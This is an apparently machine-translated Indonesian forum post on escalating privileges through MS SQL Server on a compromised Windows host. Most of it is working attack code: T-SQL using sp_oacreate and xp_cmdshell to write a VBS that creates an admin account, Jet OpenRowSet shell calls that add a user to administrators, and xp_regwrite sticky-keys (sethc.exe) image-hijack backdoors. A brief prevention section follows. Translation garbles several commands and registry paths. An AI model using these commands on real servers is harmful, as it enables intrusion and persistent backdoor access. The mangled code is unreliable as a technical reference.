pada FTP drive CFT atau menulis skrip eskalasi VBS secara langsung Deklarasikan @o int, @f int, @t int, @ret int exec sp_oacreate 'scrip remove ting.filesystemobject', @o keluar exec sp_oamethod @o, 'createtextfile', @f keluar, 'c:\1.vbs', 1 exec @ret = sp_oamethod @f, 'writeline', NULL,'Set o=CreateObject( "Shell.Users" )' exec @ret = sp_oamethod @f, 'writeline', NULL,'Set z=o.create('user")' exec @ret = sp_oamethod @f, 'writeline', NULL,'z.changePassword "password","' exec @ret = sp_oamethod @f, 'writeline', NULL,'z.setting("AccountType")=3' Kemudian cmd mengeksekusi cscrip untuk menghapus t c:\1.vbs 4. Yang sebelumnya diperbaiki untuk mengeksekusi perintah cmd, tetapi setelah beberapa perbaikan, masalah baru akan muncul (1) Pesan: Terjadi kesalahan selama eksekusi xp_cmdshell. Panggilan 'CreateProcess' gagal dengan kode kesalahan: '5'. Kesalahan 5 adalah nomor kesalahan yang diminta oleh sistem, CreateProcess adalah arti membuat utas, pembuatan kesalahan ini banyak berkaitan dengan cmd.exe file sistem, satu adalah cmd dihapus, yang lainnya adalah izin cmd berkurang. SQL untuk memeriksa port terminal dan status terbuka: master eksekutif .. xp_regread 'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp','PortNumber' Oke, poin utama di bawah ini adalah menggunakan dua instruksi SQL untuk menyalin file penjelajah sistem ke dalam file pintu belakang shift sistem, dan dua pernyataan berikut dijalankan secara terpisah. Pernyataan ini menyalin explorer.exe sebagai sethc.exe deklarasikan @o int exec sp_oacreate 'scripremove ting.filesystemobject', @o keluar exec sp_oamethod @o, 'copyfile',null,'c:\windows\explorer.exe','c:\windows\system32\sethc.exe'; Pernyataan ini menyalin sethc.exe ke direktori dllcache Deklarasikan @oo int exec sp_oacreate 'scrip remove ting.filesystemobject', @oo keluar exec sp_oamethod @oo, 'copyfile',null,'c:\windows\system32\sethc.exe','c:\windows\system32\dllcache\ sethc.exe'; Dua pernyataan lainnya menggunakan prosedur sp_oacreate tersimpan yang perlu menggunakan file odsole70.dll, sehingga kelangsungan hidup file ini terkait dengan keberhasilan pembuatannya. (2), xpsql.cpp: Kesalahan 5 dari CreateProcess (baris 737) Situasi ini lebih rumit, dan dikatakan di Internet EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SoftWare\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',0 Pilih * dari OpenRowSet('Microsoft.Jet.OLEDB.4.0','; Database=c:\windows\system32\ias\ias.mdb','select shell("net user 123 123 /add")'); Pilih * dari OpenRowSet('Microsoft.Jet.OLEDB.4.0','; Database=c:\windows\system32\ias\ias.mdb','select shell("net localgroup administrators 123 /add")'); Saya memeriksa kotak pasir untuk meningkatkan hak masalah ini, tetapi melalui praktik saya, tingkat keberhasilan ini sangat rendah, karena sebagian besar server telah menghapus c:\windows\system32\ias\ias.mdb. Kemudian Anda dapat mencoba sethc pembajakan gambar, tentu saja pembajakan gambar juga bersyarat, 1 untuk ada xp_regwrite prosedur tersimpan 2 ini adalah 'HKEY_LOCAL_MACHINE', 'SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe', Debugger' tidak dihapus Anda dapat terlebih dahulu menanyakan apakah kunci melekat registri telah dibajak master eksekutif .. xp_regread 'HKEY_LOCAL_MACHINE','PERANGKAT LUNAK \ Microsoft \ Windows NT \ Versi Saat Ini \ Opsi Eksekusi File Gambar \sethc.exe','Debugger' Jika prompt tidak menemukan masalah, bukti dihapus, tidak mungkin, jika diminta sethc.exe menjalankan perintah sql Master EXEC .. xp_regwrite @rootkey='HKEY_LOCAL_MACHINE', @key='PERANGKAT LUNAK\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc. EXE', @value_name='Debugger', @type='REG_SZ', @value='C:\WINDOWS\explorer.exe' Setelah terhubung ke terminal 5 kali dan bergeser, itu langsung ke desktop, dan kemudian menambahkannya secara manual.
Registri memodifikasi port terminal
[HKEY_LOCAL_MACHINE \ SISTEM \ CurrentControlSet \ Kontrol \ Server Terminal \ Wds \ rdpwd \ Tds \ tcp]
HKEY_LOCAL_MACHINE \ SISTEM \ CurrentControlSet \ Kontrol \ Server Terminal \ WinStations \ RDP-TCP,
Mengenai pencegahan pembajakan gambar, terutama dicapai melalui metode berikut:
★ Undang-Undang Pembatasan Izin
Jika pengguna tidak lagi memiliki akses ke kunci registri, pengguna tidak dapat mengubah hal-hal ini. Buka Editor Registri dan buka HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Image File Execution Options, pilih item ini, klik kanan - > izin - > lanjutan, dan turunkan izin administrator dan pengguna sistem (di sini Anda hanya perlu membatalkan operasi penulisan).
★ Metode rami berantakan pemotongan pisau cepat
Buka editor registri dan buka bilah
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options
Masalahnya dapat diselesaikan dengan langsung menghapus item Opsi Eksekusi File Gambar.
Perintah SQL membajak backdoor instalasi kunci lengket registri xp_regwrite 'HKEY_LOCAL_MACHINE', 'PERANGKAT LUNAK \ Microsoft \ Windows NT \ CurrentVersion \ Opsi Eksekusi File Gambar \ sethc.exe', 'Debugger','REG_SZ','C:\WINDOWS\system32\kdsn.exe'
Unduhan Perangkat Lunak:Wisatawan, jika Anda ingin melihat konten tersembunyi dari posting ini, silakan Jawab
|
Mantan:Pemahaman tentang DDL, DML, dan DCLDepan:Oracle mendapatkan fungsi panjang string length() dan hengthb()
|